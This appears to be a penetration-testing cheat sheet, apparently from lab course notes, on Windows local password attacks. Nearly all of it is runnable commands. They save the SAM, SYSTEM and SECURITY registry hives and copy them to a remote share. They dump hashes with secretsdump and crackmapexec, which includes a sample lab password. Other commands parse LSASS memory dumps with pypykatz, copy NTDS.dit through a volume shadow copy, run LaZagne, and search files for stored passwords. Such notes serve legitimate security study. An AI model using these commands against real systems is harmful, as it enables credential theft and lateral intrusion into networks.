Windows Local Password Attacks

Attacking SAM

# Copy Registery Hives
# Admin Priv Needed
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

# Copy To Local Machine
move sam.save \\<IP\share

# Dump Hashes
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump SAM Remotly
crackmapexec smb <IP> --local-auth -u bob -p HTB_@cademy_stdnt! --sam

Attacking LSASS

Dumping LSASS

# Finding LSASS PID
tasklist /svc
Get-Process lsass

# Dump .dump file
pypykatz lsa minidump lsass.dmp

Generating UserNames

https://github.com/urbanadventurer/username-anarchy

./username-anarchy -i <usernames.list>

Capturing NTDS.dit

Shadow Copy (Manual)

# Creating Shadow Copy 
## Admin privs needed
vssadmin CREATE SHADOW /For=C:

# Copy NTDS from vss
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

CrackMapExec (Automatic & Faster)

crackmapexec smb <ip> -u <user> -p <pass> --ntds

Credential Hunting

Lazagne

Tools: https://github.com/AlessandroZ/LaZagne

# STart Lazagne
start lazagne.exe all

Find Command

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

PreviousLinux Local Password Attacks NextWindows Lateral Movement

Last updated 12 months ago